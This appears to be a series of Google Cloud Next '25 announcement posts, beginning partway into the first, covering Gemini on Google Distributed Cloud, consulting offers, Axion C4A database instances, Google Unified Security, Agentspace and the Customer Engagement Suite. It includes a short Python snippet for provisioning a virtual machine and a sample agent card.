Gemini models deliver breakthrough AI performance: they can analyze million-token contexts; are multimodal, i.e., can process diverse data formats such as text, image, audio and video; and operate globally across 100+ languages.
Further, the Gemini API offers AI inferencing without having to worry about infrastructure, OS management, or model lifecycle management. This enables you to:
Add your own business context: Use Retrieval Augmented Generation (RAG) to personalize and augment the AI model’s output, eliminating the need for fine-tuning or retraining the models.
Automate information processing and knowledge extraction: Improve employee efficiency by using gen AI to quickly summarize long documents, analyze sentiment in reports or feedback, or add captions to image, audio, and video content.
Create interactive conversational experiences: Build deeper customer relationships by enabling Gemini-powered customer support agents, chatbots via natural language, and employee assistants.
Tailor agents for your industry’s use case: Unlock highly specialized capabilities and workflows by developing tailored agents for everyone from financial advisors, to security assistants, to robotics.
“Gemini on Google Distributed Cloud will empower ServiceNow to augment powerful agentic AI capabilities such as reasoning in our existing systems via robust APIs. This strategic deployment allows us to explore and implement cutting-edge advancements while upholding our commitment to customer trust and data protection.” – Pat Casey, Chief Technology Officer & EVP of DevOps, ServiceNow
Vertex AI: one platform for cloud and on-prem
In addition to bringing Gemini to Google Distributed Cloud, customers today already benefit from the Vertex AI platform on GDC, which lets them accelerate the development, deployment, and management of agentic applications.
This complete AI platform offers:
Pre-trained APIs: Ready-to-use, task-optimized, pre-trained APIs based on advanced Google models for translation, speech-to-text, and optical character recognition (OCR). These APIs offer advanced features such as customizable glossaries and in-place document translation
Gen AI building tools: Open-source and third-party models with optimized inferencing on GKE, delivering fast startup and auto-scaling
Retrieval Augmented Generation (RAG): Grounding using Google Agentspace search, plus LLM API management and governance using Apigee on-prem
Built-in embeddings API and AlloyDB vector database: Powerful applications for personalization and recommendations, enabling improved user experiences
“With Google Distributed Cloud, Vertex AI, and Agentspace search, we will empower our Home Team innovators with a secure AI/ML platform and unified search, enabling the use of AI to enhance productivity and transform public safety for a safer and more secure future.” – Chee Wee Ang, Chief AI Officer, HTX
Google Agentspace: out-of-the-box access to on-prem data
Enterprises are eager to deploy gen AI, but they also struggle to connect large volumes of siloed information across various repositories and formats such as images, PDFs, and text. This hinders productivity and innovation. At the same time, building an in-house search solution is costly and requires access to scarce AI expertise.
We are excited to announce Google Agentspace search will be available on GDC, with public preview starting in Q3 2025. Google Agentspace search provides all enterprise knowledge workers with out-of-the-box capabilities that unify access to all your data in a secure, permissions-aware way.
Agentspace gives you access to:
Company-branded, multimodal search agent: A conversational search interface that can answer complex questions based on your company’s unique information, acting as a central source of enterprise truth for your entire organization
Pre-built enterprise data connectors: Connectors to index data from the most common on-prem enterprise systems (such as Confluence, Jira, ServiceNow, and SharePoint)
Permissions-aware search results: Robust access control list (ACL) enforcement that helps ensure search results are permissions-aware, maintaining security and compliance for all your on-prem data
Agentspace agents: Vertex AI is integrated out-of-the-box with Agentspace, starting with search agents, with more pre-built agents coming soon, and the ability to build your own
Get started with gen AI on GDC
We’re constantly innovating on GDC to make it the leading platform for gen AI and modern application development that you can deploy anywhere. To bring Gemini and gen AI to your premises, contact us at gdc-gemini@google.com or reach out to any of our accredited global partners.
Enterprise customers are coming to Google Cloud to transform their businesses with AI, and many are turning to our seasoned experts at Google Cloud Consulting to help implement these innovations.
Working alongside our many partners, Google Cloud Consulting teams are helping customers identify the right use cases for AI, deliver them safely and securely, and then generate strong ROI. In fact, engagements focused on implementing Google Cloud AI have become the fastest-growing area within our consulting practice over the past year — indicating the tremendous level of excitement around Google’s AI offerings.
This week at Google Cloud Next, we’re leaning into this success with the launch of several new offers, delivered by Google Cloud Consulting and our partners. These are all aimed at a simple, yet important goal: making it even easier for enterprises to capitalize on our entire portfolio of AI models, AI-optimized infrastructure, AI platforms, and agentic technologies.
We’re also expanding access to Delivery Navigator, a platform that offers a wide range of resources for teams working on cloud-based projects, including project plan templates, technical instructions, predictive insights, and smart recommendations.
And finally, to demonstrate the proven business impact of our work, we’re excited to showcase a pair of significant projects our team has completed with industry leaders: Airbus and Broadcom.
Accelerate your transformation: new service offerings
To accelerate our customers’ digital transformations and streamline technology adoption, we’re introducing three new pre-packaged service offerings. These tailored offers provide a clear and proven path that can lead enterprises from concept to deployment, enabling them to rapidly adopt our technologies and avoid costly missteps. Each offering can be customized to meet your unique needs, ensuring an efficient and effective technology implementation journey.
New offers available this week:
Agentspace Accelerator provides a structured approach to connecting and deploying AI-powered search within organizations, so employees can easily access relevant internal information and resources when they need them. As part of this service offer, our team of experts facilitates the secure integration of enterprise data with Gemini’s advanced reasoning and Google-quality search, along with customizable add-ons for cloud setup, data preparation, and strategic enablement. The Agentspace Accelerator offering is the stepping stone for organizations to create their own AI-powered agents, agentic workflows, and more within a single unified platform.
Optimize with TPUs helps customers migrate workloads to TPUs, our purpose-built AI chips, so they can maximize the performance they get from their AI inference and training spend. TPUs are designed to scale cost-efficiently across a variety of use cases, including chatbots, code generation, media content creation, synthetic speech, personalization models, and recommendation engines. Through a six-week engagement, Google Cloud experts will develop a custom backend wrapper around your existing AI infrastructure, enabling you to easily shift workloads to TPUs while maintaining the flexibility to toggle to other chips as needed.
Oracle on Google Cloud empowers customers to fully leverage the benefits of our partnership with Oracle, combining Oracle databases and applications with Google Cloud’s advanced platform and AI capabilities for enhanced database and network performance. Through a tailored engagement, Google Cloud experts will assist in deploying and optimizing Oracle through a variety of modalities, such as bring-your-own-licenses with Google Kubernetes Engine or Oracle Cloud Infrastructure with Google Cross-Cloud Interconnect. This offering enables customers to improve database and network speed, while gaining streamlined access to Google Cloud’s AI and data tools to help simplify the creation of AI-powered applications.
Next up: The AI-enhanced Delivery Navigator platform
To further empower our customers’ cloud journeys, we’re excited to expand access to Delivery Navigator, a platform designed to bring efficiency and confidence to Google Cloud projects. Currently, our partners and consulting teams use Delivery Navigator to access proven delivery methodologies and best practices that help them guide migrations and technology implementations efficiently and safely.
Starting in October, we will begin to roll out Delivery Navigator to customers as well, available in preview. This means participating customers will have direct access to the same frameworks, tooling, tips, and best practices used by Google Cloud’s own teams.
Built around a conversational AI-chat interface, Delivery Navigator offers a wide range of resources for teams working on cloud-based projects, including project plan templates, detailed technical instructions with example code, and predictive insights and smart recommendations to help teams proactively address technical challenges. It covers many of the common variables encountered during solution implementation, as well as rarer hurdles, and there’s plenty of guidance on how to optimize Google Cloud deployments and accelerate time-to-value.
By providing access to the same advanced frameworks and AI enhancements used by our own experts, Delivery Navigator enables a smoother, faster, and more successful path to realizing the full value of Google Cloud.
Bringing cloud and AI projects to life
Customers are already achieving remarkable outcomes with the support of Google Cloud Consulting experts and our partner ecosystem, and this week, we’re excited to share our work with enterprise customers like Airbus and Broadcom. While each customer’s needs differ, the common theme is that Google Cloud Consulting is helping enterprises implement Google Cloud technology and migrate workloads within complex IT environments – and doing so safely and securely.
Airbus streamlined its IT landscape in Canada through a strategic migration, in a post-merger integration context, from on-prem servers to Google Cloud. This transformation gives Airbus enhanced visibility into and ownership of its complex IT infrastructure in Canada, enabling the company to modernize through the migration of more than 500 systems.
Leveraging robust infrastructure and migration tools, Airbus completed a rapid and seamless migration of 2.5 petabytes of data on time. This revamped tech stack helps Airbus support increased production rates in Canada and contributes to strengthening airline trust.
Broadcom is driving its digital transformation by optimizing its compute and data landscape through a strategic VMware migration to Google Cloud — and boosting employee efficiency with the deployment of Gemini Code Assist.
Broadcom engaged a group of experts from Google Cloud Consulting to efficiently migrate twelve SaaS products, including their data infrastructures, while maintaining zero downtime. This unified data environment empowers Broadcom to access and analyze data with greater efficiency, leading to deeper product insights and enhanced customer experiences.
Furthermore, Broadcom is rolling out Gemini Code Assist to their employees, through a robust enablement program led by Google Cloud Consulting that features hands-on training, accessible office hours, and ongoing chat support.
Building the future together
At Google Cloud Consulting, we’re passionate about empowering businesses to thrive in the cloud and AI era. We’re committed to guiding customers every step of the way, from initial planning and implementation to ongoing optimization. Contact us today to discover how we can help you achieve your business objectives in this new era of technology.
Last year we announced Google Axion processors, our first custom Arm®-based CPUs. We built Axion to address our customers’ need for general-purpose processors that maximize performance, reduce infrastructure costs, and help them meet their sustainability goals.
Since then, Axion has shaken up the market for cloud compute. Customers love its price-performance — up to 65% better than current-generation x86 instances. It even outperforms leading Arm-based alternatives by up to 10%. Axion C4A instances were also the first virtual machines to feature new Google Titanium SSDs, with up to 6TB of high-performance local storage, up to 2.4M random read IOPS, up to 10.4 GiB/s of read throughput, and up to 35% lower access latency compared to previous-generation SSDs. In fact, in the months since launch, over 40% of Compute Engine’s top 100 customers have adopted Axion, thousands of Google’s internal applications now run on Axion, and we continue to expand integration of C4A and Axion with our most popular Google Cloud products and partner solutions.
Today, we are excited to share that Cloud SQL and AlloyDB for PostgreSQL managed databases are available in preview on C4A virtual machines, providing significant price-performance advantages for database workloads. To utilize Axion processors today, you can now choose to host your database on a C4A VM directly from within the console.
Supercharging database workloads
Organizations with business-critical database workloads need high-performance, cost-efficient, available, and scalable infrastructure. However, a surge in data growth, alongside higher and more complex processing requirements, is creating challenges.
C4A instances bring significant advantages to managed Google Cloud database workloads: improved price-performance compared to x86 instances, translating to more cost-effective database operations. Designed to handle data-intensive workloads requiring real-time processing, C4A is well-suited for high-performance databases and analytics engines.
When running on C4A instances, AlloyDB and Cloud SQL provide nearly 50% better price-performance than N series VMs for transactional workloads, and up to 2x better throughput than Amazon’s equivalent Graviton 4 offerings.
“At Mercari, we deploy thousands of Cloud SQL instances across engines and editions to meet our diverse database workload requirements. At our scale, it is critical to optimize our fleet to run more efficiently. We are excited to see the price-performance improvements on the new Axion-based C4A machine series for Cloud SQL. We look forward to adopting C4A instances in our MySQL and PostgreSQL fleet and taking advantage of the C4A’s high-performance while at the same time reducing our operational costs.” – Takashi Honda, Database Reliability Engineer, Mercari
We’ve also expanded regional availability for Axion and C4A, which are now broadly available across 10 Google Cloud regions and will expand to 15 in the coming months. Cloud SQL and AlloyDB on Axion are now available in eight regions, with more to be added before the end of the year.
Google’s internal fleet and top customers choose Axion
Given its price-performance, it’s no surprise that in less than a year, Axion is a popular choice for Google internal applications and top Compute Engine customers, including Spotify:
“As the world’s most popular audio streaming subscription service, reaching over 675 million users, Spotify demands exceptional performance and efficiency. We are in the process of migrating our entire compute infrastructure to Axion and this is yielding remarkable results. We’re witnessing a staggering 250% performance increase, significantly enhancing the user experience, as much as 40% reduction in compute costs, and a drastic reduction in compute management toil, allowing us to reinvest in further innovation and growth.” – Dave Zolotusky, Principal Engineer, Spotify
And we’re only just getting started. We’re also making it easier for Google Cloud customers to benefit from Axion’s price-performance without having to refactor their applications. Google Cloud customers can already use C4A VMs in Compute Engine, Google Kubernetes Engine (GKE), Batch, Dataproc, Dataflow, and more services.
Expanding the Axion and Arm ISV ecosystem
Axion processors are delivering undeniable value for customers and ISVs looking for security, efficiency and competitive price-performance for data processing. We’re pleased to report that ClickHouse, Databricks, Elastic, MongoDB, Palo Alto Networks, Redis Labs, and Starburst have all chosen Axion to power their data processing products — with support from many more ISVs on the way. This commitment is notable as ISVs often choose Axion over alternative processors, including Arm-based processors from other cloud providers.
Enhancing diverse ML inference workloads
Machine learning (ML) inference workloads span traditional embedding models to modern generative AI applications, each with unique price-performance needs that defy a one-size-fits-all approach. The range of inference tasks, from low-latency real-time predictions to high-throughput batch processing, necessitates infrastructure designed for specific workload requirements.
Google’s Axion C4A VMs deliver exceptional performance for ML workloads through architectural strengths like the Arm Neoverse V2 compute cores, with high single-threaded performance and per-core memory bandwidth for predictable, high-throughput execution, and Google’s Titanium offload technology for reduced overhead. With up to 72 vCPUs, 576 GB of DDR5 memory, and advanced SIMD processing capabilities, Axion C4A excels at matrix-heavy inference tasks. Combined with its ready availability, operational familiarity, and up to 60% better energy efficiency compared to x86 alternatives, Axion offers a compelling CPU-based ML inference platform alongside GPUs and TPUs.
In particular, Axion is well-suited for real-time serving of recommendation systems, NLP, threat detection, and image recognition models. As large language models (LLMs) with lower parameter counts (3-8B) grow increasingly capable, Axion can also be a viable platform for serving these models efficiently.
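Provisioning Axion capacity for CPU inference looks like any other Compute Engine request. The sketch below uses the google-cloud-compute client with an Arm64 Debian image; the project, zone, instance name, and sizing are assumptions you would adjust to your workload.

from google.cloud import compute_v1

project, zone = "my-project", "us-central1-a"  # hypothetical values

# Describe a C4A (Axion) VM with an Arm64 boot image.
instance = compute_v1.Instance(
    name="axion-inference-1",
    machine_type=f"zones/{zone}/machineTypes/c4a-standard-72",
    disks=[
        compute_v1.AttachedDisk(
            boot=True,
            auto_delete=True,
            initialize_params=compute_v1.AttachedDiskInitializeParams(
                source_image="projects/debian-cloud/global/images/family/debian-12-arm64",
                disk_size_gb=100,
            ),
        )
    ],
    network_interfaces=[compute_v1.NetworkInterface(network="global/networks/default")],
)

operation = compute_v1.InstancesClient().insert(
    project=project, zone=zone, instance_resource=instance
)
operation.result()  # block until provisioning completes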
Customers have recognized this strength and are actively deploying ML inference workloads on C4A VMs to capitalize on its blend of performance, cost-effectiveness, and scalability, proving it a worthy complement to GPU-centric strategies. Palo Alto Networks uses C4A as part of its diversified ML infrastructure strategy and realized an 85% improvement in TCO efficiency by migrating its threat detection inference application from L4 GPUs to C4A.
“By migrating to Axion on Google Cloud, our testing shows that DNS Security will see an 85% improvement in price-performance, a 2X decrease in latency for DNS queries, and an 85% cost savings compared to instances with mid-range GPUs, enhancing our ML-powered DGA detections for customers.” – Fan Fei, Director of Engineering, Palo Alto Networks
Learn more about Axion-based C4A virtual machines
In their quest to balance performance, efficiency, and cost, more and more organizations are turning to the Arm architecture. Axion’s strong price-performance, combined with a growing ecosystem of support for mission-critical workloads, makes it a compelling choice. We’ve seen incredible excitement for Axion-based C4A virtual machines from our customers and partners, and we can’t wait to see what you can build with Axion, too. Try Cloud SQL and AlloyDB running on C4A virtual machines today.
Today at Google Cloud Next, we are announcing Google Unified Security, new security agents, and innovations across our security portfolio designed to deliver stronger security outcomes and enable every organization to make Google a part of their security team.
Introducing Google Unified Security
Enterprise infrastructure continues to grow in size and complexity, expanding the attack surface, and making defenders’ jobs increasingly difficult. Separate, disconnected security tools result in fragmented data without relevant context, leaving organizations vulnerable and reactive in the face of escalating threats. Security teams operate in silos, slowed by toilsome workflows, making it hard to accurately assess and improve the organization’s overall risk profile.
To address this challenge, we are bringing together our best-in-class security products for threat intelligence, security operations, cloud security, and secure enterprise browsing, along with Mandiant expertise, into a converged security solution powered by AI: Google Unified Security.
Now generally available, Google Unified Security lays the foundation for superior security outcomes. It creates a single, scalable, searchable security data fabric across the entire attack surface. It provides visibility, detection, and response capabilities across networks, endpoints, clouds, and apps. It automatically enriches security data with the latest Google Threat Intelligence for more effective detection and prioritization. Crucially, Google Unified Security makes every aspect of the practitioner experience more efficient with Gemini.
“Google Unified Security represents a step forward in achieving better security outcomes with the integration of browser behavior, managed threat hunting, and security validation to strategically eliminate coverage gaps and simplify security management and threat detection and response. This approach offers organizations a more holistic and streamlined defense against today’s complex threat landscape,” said Michelle Abraham, senior research director, Security and Trust, IDC.
At the heart of Google Unified Security’s capabilities lie its integrated product experiences, exemplified by:
Browser telemetry and asset context from Chrome Enterprise integrated into Google Security Operations to power threat detections and remediation actions.
Google Threat Intelligence integrated with security validation to proactively understand exposures and test security controls against the latest observed threat actor activity.
Cloud risks and exposures from Security Command Center, including those impacting AI workloads, enriched with integrated Google Threat Intelligence to more effectively threat hunt and triage incidents.
Infused with new semi-autonomous AI capabilities, these integrated products provide preemptive security, enabling organizations to anticipate threats and remediate risks before attackers can act to cause business damage or loss.
“I see Google and its security suite as one of the top partnerships that I have within my organization. The value they bring, the expertise and the knowledge, the willingness to play with us to explore new opportunities and to look at new areas — it makes them a true partner and someone that we’re very happy to be working together with,” said Craig McEwen, deputy CISO, Unilever.
“Accenture and Google Cloud partner to help clients achieve the cyber resilience their businesses need to stay ahead of today’s threats. By integrating advanced threat intelligence, comprehensive visibility and AI assistance, we can help organizations shift from reactive to proactive and agile responses,” said Paolo Dal Cin, global lead, Accenture Security. “This unified approach, powered by Google Unified Security, can help us deliver a new standard of cyber resilience with greater scale, speed and effectiveness.”
“Deloitte Cyber and Google Cloud are working closely together to secure the modern enterprise – which includes using the leading capabilities from both Deloitte and Google to protect data, users, and applications. Google Unified Security brings together a centralized data fabric, integrated threat intelligence, unified SOC and cloud workflows, and agentic AI automation — creating a powerful platform to drive our clients’ security transformation,” said Adnan Amjad, principal, U.S. cyber leader, Deloitte & Touche LLP.
Security agents and Gemini
Agentic AI is powering a fundamental shift in how security operations are conducted. Our vision is a future where intelligent agents work alongside human analysts, offloading routine tasks, augmenting their decision-making, and freeing them to focus on complex issues. Today we’re introducing the following new Gemini in Security agents:
In Google Security Operations, an alert triage agent performs dynamic investigations on behalf of users. Expected to preview for select customers in Q2 2025, this agent analyzes the context of each alert, gathers relevant information, and renders a verdict on the alert, along with a history of the agent’s evidence and decision making. This always-on investigation agent will vastly reduce the manual workload of Tier 1 and Tier 2 analysts who otherwise are triaging and investigating hundreds of alerts per day.
In Google Threat Intelligence, a malware analysis agent investigates whether code is safe or harmful. Expected to preview for select customers in Q2 2025, this agent analyzes potentially malicious code, including the ability to create and execute scripts for deobfuscation. Ultimately, the agent summarizes its work and provides a final verdict.
These agentic AI advancements aim to deliver faster detection and response, with complete visibility and streamlined workflows. They represent a catalyst for security teams to reduce toil, build true cyber-resilience, and drive strategic program transformation.
What’s new in Google Security Operations
New data pipeline management capabilities, now generally available, can help customers better manage scale, reduce costs, and satisfy compliance mandates. Expanding our partnership with Bindplane, you can now transform and prepare data for downstream use; route data to different destinations and multiple tenants to manage scale; filter data to control volume; and redact sensitive data for compliance.
The new Mandiant Threat Defense service for Google Security Operations, now generally available, provides comprehensive active threat detection, hunting, and response. Mandiant experts work alongside customer security teams, using AI-assisted threat hunting techniques to identify and respond to threats, conduct investigations, and scale response through security operations SOAR playbooks, effectively extending customer security teams.
What’s new in Security Command Center
We recently announced AI Protection capabilities for managing risk across the AI lifecycle for Google Cloud customers. AI Protection helps discover AI inventory, secure AI models and data, and detect and respond to threats targeting AI systems.
Model Armor, which is generally available and part of AI Protection, allows you to apply content safety and security controls to prompts and responses for a broad range of models across multiple clouds. Model Armor is now integrated directly with Vertex AI so developers can automatically route prompts and responses for protection without any changes to applications.
New Data Security Posture Management (DSPM) capabilities, coming to preview in June, can enable discovery, security, governance, and monitoring of sensitive data including AI training data. DSPM can help discover and classify sensitive data, apply data security and compliance controls, monitor for violations, and enforce access, flow, retention, and protection directly in Google Cloud data analytics and AI products.
A new Compliance Manager, launching in preview at the end of June, will combine policy definition, control configuration, enforcement, monitoring, and audit into a unified workflow. It builds on the configuration of infrastructure controls delivered using Assured Workloads, providing Google Cloud customers with an end-to-end view of their compliance state, making it easier to monitor, report, and prove compliance to auditors with Audit Manager.
Other Security Command Center enhancements include:
Integration with Snyk’s developer security platform, in preview, to help teams find and fix software vulnerabilities faster.
New Security Risk dashboards for Google Compute Engine and Google Kubernetes Engine, generally available, which deliver insights into top security findings, vulnerabilities, and open issues directly in the product consoles.
We are also expanding our Risk Protection Program, which provides discounted cyber-insurance coverage based on cloud security posture. We’re thrilled to welcome Beazley and Chubb, two of the world’s largest cyber-insurers, as new program partners to expand customer choice and broaden international coverage.
As part of the program, our partners provide affirmative AI insurance coverage, exclusively for Google Cloud customers and workloads. Chubb will also offer coverage for risks resulting from quantum exploits, proactively helping to address the risk of quantum computing attacks.
What’s new in Chrome Enterprise
New employee phishing protections in Chrome Enterprise Premium use Google Safe Browsing data to help protect employees against lookalike sites and portals attempting to capture credentials. Organizations can now configure and add their own branding and corporate assets to help employees identify phishing attempts disguised as internal domains.
Organizations continue to benefit from the simple and effective data protections in Chrome. In addition to watermarking and screenshot blocking, and controls for copy, paste, upload, download, and printing, Chrome Enterprise Premium data masking is now generally available. We’re also extending key enterprise browsing protections to Android, including copy and paste controls, and URL filtering.
What’s new in Mandiant Cybersecurity Consulting
The Mandiant Retainer provides on-demand access to Mandiant experts with pre-negotiated terms and two-hour incident response times. Customers now have additional flexibility to redeem pre-paid funds for investigations, education, and intelligence to boost their expertise and resilience.
Mandiant Consulting is also partnering with Rubrik and Cohesity to create a solution to minimize downtime and recovery costs after a cyberattack. Together, Mandiant consultants and our data backup and recovery partners can help customers establish, test, and validate a cloud-isolated recovery environment (CIRE) for critical applications on Google Cloud, and deliver incident response services in the event of a compromise.
What’s new for Trusted Cloud
We continue regular delivery of new security controls and capabilities on our cloud platform to help organizations meet evolving policy, compliance, and business objectives. Today we’re announcing the following updates:
For Sovereign Cloud:
Google Cloud has brought to market the industry’s broadest portfolio of sovereign cloud solutions, providing customers with choice to meet the unique and evolving requirements for data, operational, and software sovereignty. Google Cloud offers Regional and Sovereign Controls across 32 regions in 14 countries. We also offer Google Cloud Sovereign AI services in our public cloud, sovereign cloud, and distributed clouds, as well as with Google Workspace.
We’ve partnered with Thales to launch the S3NS Trusted Cloud, now in preview, designed to meet France’s highest level of cloud certification, the SecNumCloud standard defined by the French national cybersecurity agency (ANSSI). It is the first sovereign cloud offering based on the Google Cloud platform that is operated, majority-owned, and fully controlled by a European organization.
For Identity and Access Management:
Unified access policies, coming to preview in Q2, create a single definition for IAM allow and IAM deny policies, enabling you to more consistently apply fine-grained access controls.
We’re also expanding our Confidential Computing offerings. Confidential GKE Nodes with AMD SEV-SNP and Intel TDX will be generally available in Q2, requiring no code changes to secure your standard GKE workloads. Confidential GKE Nodes with NVIDIA H100 GPUs on the A3 machine series will be in preview in Q2, offering confidential GPU computing without code modifications.
Single-tenant Cloud Hardware Security Module (HSM), now in preview, provides dedicated, isolated HSM clusters managed by Google Cloud, while granting customers full administrative control.
For network security:
Network Security Integration allows enterprises to easily insert third-party network appliances and service deployments to protect Google Cloud workloads without altering routing policies or network architecture. Out-of-band integrations with ecosystem partners are generally available now, while in-band integrations are available in preview.
DNS Armor, powered by Infoblox Threat Defense, coming to preview later this year, uses multi-sourced threat intelligence and powerful AI/ML capabilities to detect DNS-based threats.
Cloud Armor Enterprise now includes hierarchical policies for centralized control and automatic protection of new projects, available in preview.
Cloud NGFW Enterprise supports L7 domain filtering capabilities to monitor and restrict egress web traffic to only approved destinations, coming to preview later this year.
Secure Web Proxy (SWP) now includes inline network data loss protection capabilities through integrations with Google’s Sensitive Data Protection and Symantec DLP using service extensions, available in preview.
Take the next step
These announcements just scratch the surface of the outcomes we can deliver when we converge our security capabilities and infuse them with AI and our frontline intelligence.
In today’s threat landscape, one of the most critical choices you need to make is who will be your strategic security partner. Google Unified Security is the best, easiest, and fastest way to make Google part of your security team.
For more on our Next ‘25 announcements, you can watch our security spotlight, and check out the many great security breakout sessions at Next ‘25 — live and on-demand.
AI agents are a major leap from traditional automation or chatbots. They can execute complex workflows, from planning and research, to generating and testing novel ideas. But to scale, businesses need an AI-ready information ecosystem that can work across silos, easy ways to create and adopt agents, and enterprise-grade security and compliance.
That’s why we launched Google Agentspace in December. This product puts the latest Google foundation models, powerful agents, and actionable enterprise knowledge in the hands of employees. With Agentspace, employees and agents can find information from across their organization, synthesize and understand it with Gemini’s multimodal intelligence, and act on it with AI agents.
Since the launch, we have seen tremendous interest in Agentspace from leading organizations like Banco BV, Cohesity, Gordon Food Services, KPMG, Rubrik, Wells Fargo, and more.
We’re accelerating this momentum by expanding Agentspace, currently generally available via allowlist, to make creating and adopting agents simpler. Starting today, customers can:
Give employees access to Agentspace’s unified enterprise search, analysis, and synthesis capabilities, directly from the search box in Chrome
Discover and adopt agents quickly and easily with Agent Gallery, and create agents with our new no-code Agent Designer
Deploy Google-built agents such as our new Deep Research and Idea Generation agents to help employees generate and validate novel business ideas, synthesize dense information, and more
“We recently began our roll out of Google Agentspace to US employees at Gordon Food Service, with the goal of empowering them with greater access to our enterprise intelligence. This implementation has already started to transform how we access enterprise knowledge, wherever it is, as our searches are now grounded in our data across Google Workspace and other sources like ServiceNow. Employees are benefitting from easier access because they can search across multiple systems in one place, which translates to better decision-making, and less legwork to discover information. Ultimately, Agentspace will enhance both our internal operations and product development, enabling us to serve our customers better.” – Matt Jansen, Manager of Emerging Technology, Gordon Food Service.
Unified agentic search, directly from the search box in Chrome
Imagine being able to find any piece of information within the organization – whether that’s text, images, websites, audio, or video – with the ease and power of Google-quality search. That’s what we’re bringing to enterprises with Google’s AI-powered multimodal search capabilities in Agentspace, helping customers find what they need, regardless of how – and where – it’s stored. Whether the right information resides in common work apps like Google Workspace or Microsoft 365, apps like Jira, Salesforce, or ServiceNow, or in content from the web, Agentspace breaks down silos and understands organizational context. By building an enterprise knowledge graph for each customer — connecting employees with their team, documents they have created, software and data they can access, and more — it helps turn disjointed content into actionable knowledge.
Starting today in preview, Agentspace is integrated with Chrome Enterprise, letting employees leverage Agentspace’s unified search capabilities right from the search box in Chrome. Bringing Agentspace directly into Chrome will help employees easily and securely find information, including data and resources, right within their existing workflows.
Find data within your existing workflows directly from the search box in Chrome
Fast, simple agent adoption and creation
Google Agentspace provides employees – no matter their technical expertise – with access to specialized agents connected to various enterprise systems, so employees can integrate agents into their workflows and priorities with ease. We’re introducing two new features to help employees adopt and create agents for their specific needs:
Agent Gallery, generally available with allowlist, gives employees a single view of available agents across the enterprise, including those from Google, internal teams, and partners — making agents easy to discover and use. Customers can choose agents published by partners in Google Cloud Marketplace, then enable them in Agent Gallery, adding to our agent ecosystem and options for customers.
Agent Designer, in preview with allowlist, is a no-code interface for creating custom agents that connect to enterprise data sources and automate or enhance everyday knowledge work tasks. This helps employees – even those with limited technical experience – create agents suited to their individual workflows and needs. Thanks to deep integration between our products, Agent Designer complements the deeper, developer-first approaches available in Vertex AI Agent Builder, and agents built in Vertex AI Agent Builder can be published to Agentspace.
Powerful new expert agents: Idea Generation agent and Deep Research agent
As part of the Agent Gallery launch, two new, Google-built expert agents will join the previously-available NotebookLM for Enterprise:
Deep Research agent, generally available with allowlist, explores complex topics on the employee’s behalf, synthesizing information across internal and external sources into comprehensive, easy-to-read reports — all with a single prompt.
Idea Generation agent, available in preview with allowlist, helps employees innovate by autonomously developing novel ideas in any domain, then evaluating them to find the best solutions via a competitive system inspired by the scientific method.
Create a multi-agent innovation session with Idea Generation agent
Beyond expert agents, Agentspace supports the new open Agent2Agent (A2A) Protocol, which is designed to let agents across different ecosystems communicate with each other. As the first hyperscaler to drive this initiative for the industry, we believe this protocol will be critical to support multi-agent communication by giving agents a common language – regardless of the framework or vendor they are built on. This allows developers to choose the tools and frameworks that best suit their needs.
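As a sketch of what that common language looks like, an A2A agent typically publishes a small JSON “agent card” describing itself so other agents can discover and call it. The structure below follows the open A2A specification in spirit, expressed as a Python dict, with every value hypothetical.

# Conventionally served at https://<agent-host>/.well-known/agent.json
agent_card = {
    "name": "expense-report-agent",
    "description": "Files and tracks employee expense reports.",
    "url": "https://agents.example.com/a2a",
    "version": "1.0.0",
    "capabilities": {"streaming": True},
    "skills": [
        {
            "id": "file_expense",
            "name": "File an expense",
            "description": "Creates an expense report from a receipt image.",
        }
    ],
}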
Enterprise-grade data protections and security
Agentspace was built on the same secure Google infrastructure trusted by billions of people. It is enterprise-ready, so as agents collaborate with employees and access corporate data, security, monitoring, and other essential requirements remain at the forefront.
It lets customers scan systems for sensitive information, such as PHI or PII data, or confidential elements, then choose whether to block these assets from agents and search. It also provides role-based access controls, encryption with customer-managed keys, data residency guarantees, and more.
We’re also growing the AI Agent Marketplace, a dedicated section within Google Cloud Marketplace. Customers can easily browse and purchase AI agents from partners such as Accenture, Deloitte, and more. Enterprise admins can make these agents available within Agentspace for added productivity and innovation. The growing variety of options lets each employee build and manage a team of agents to help them work — and we look forward to more innovation in the months to come.
Get started with Google Agentspace
As the ability to adopt and customize agents becomes more essential, we’re ready to take this journey with you — and excited to see what you accomplish with Agentspace.
Envision a future where every customer interaction is not only seamless and personalized, but delivers enduring experiences that build brand loyalty.
Today, AI agents are already transforming the ways businesses engage with customers, most visibly through advanced conversational agents. These conversational AI agents enable new levels of hyper-personalized, multimodal conversations, improving customer interactions across all touchpoints.
And this is just the beginning.
While deploying AI for customer service is not entirely new, traditional deployments were limited in their ability to deliver personalized customer experiences at scale. Google Cloud’s Customer Engagement Suite was created to address these gaps through an end-to-end AI customer experience application built with Google’s planet-scale capacity, performance, and quality. Customer Engagement Suite lets customers connect with your business across any channel — such as web, mobile, email, or voice — and offers a consistent, personalized experience wherever they connect.
Recently we announced new AI-enabled capabilities to the four products within the Customer Engagement Suite — Conversational Agents, Agent Assist, Conversational Insights, and Google Cloud Contact Center-as-a-Service.
The Conversational Agents product helps customers build virtual agents that provide self-service experiences for customer service needs. Today we are unveiling a completely revamped and more powerful product for building and running generative and agentic conversational agents. This next-generation Conversational Agents product will enable teams to create highly interactive, enterprise-grade AI agents in just a few keystrokes.
The next generation of Conversational Agents
The leading capabilities provided by the next generation of the product include:
Simplifying how AI agents are built: Building AI agents has traditionally required specialized technical expertise. The next generation of Conversational Agents will use the latest Gemini models and Agent Development Kit, along with a comprehensive suite of enterprise-grade features such as privacy controls and AI observability. These power a no-code console that enables even non-technical employees to build complex conversational AI agents that deliver exceptional customer experiences in just a few clicks.
Enabling highly engaging customer experiences: The latest Gemini models enable human-like, high-definition voices; a higher degree of comprehension; and the ability to understand emotions — which all can help AI agents adapt during conversations. The product also supports streaming video, so the agents can interpret and respond to what they see in real-time when shared from customer devices.
Automating work across operations: Earlier we introduced out-of-the-box connectors for easy integration with the most popular customer relationship management (CRM) systems, data sources, and business messaging platforms. With the next generation of Conversational Agents, enterprise users will have a variety of tools that let agents interact with their applications through API calls to perform specific tasks, such as looking up products, adding items to a cart, and checking out.
Over the last year, our portfolio of conversational AI agents and applications has helped companies enhance customer experiences and turn them into moments of brand loyalty, both within their customer service operations and beyond.
Verizon transforms customer experiences with Customer Engagement Suite
Verizon is transforming how it serves its more than 115 million wireless connections with the help of Customer Engagement Suite. Human-assisted, AI-powered agents have helped customers with a range of day-to-day tasks, in stores and over the phone.
